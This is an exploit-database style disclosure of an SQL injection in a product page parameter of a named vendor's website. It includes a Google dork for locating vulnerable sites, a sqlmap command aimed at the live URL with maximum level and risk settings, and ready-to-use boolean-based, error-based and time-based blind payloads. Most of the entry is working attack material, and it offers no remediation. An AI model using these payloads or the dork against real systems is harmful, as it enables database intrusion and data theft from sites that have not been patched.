**************************** #Exploit Title: DEBOUGAINVILLEA - SQL Injection vulnerability #Date: 2020-10-22 #Exploit Author: Mahdi Karimi #Vendor Homepage: http://debougainvillea.com #Google Dork: "Powered by Debougainvillea" #Tested On: windows 10 sqlmap: sqlmap -u "http://debougainvillea.com/product-detail.php?proid=67" --level=5 --risk=3 --dbs --random-agent Testing Method; - boolean-based blind - time-based blind - error-based Parameter: proid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: proid=67 AND 6878=6878 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: proid=67 AND (SELECT 7008 FROM(SELECT COUNT(*),CONCAT(0x7162767671,(SELECT (ELT(7008=7008,1))),0x717a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: proid=67 OR (SELECT 6693 FROM (SELECT(SLEEP(5)))lCnf) ************************************************** #Discovered by: Mahdi Karimi #Email : [email protected] **************************************************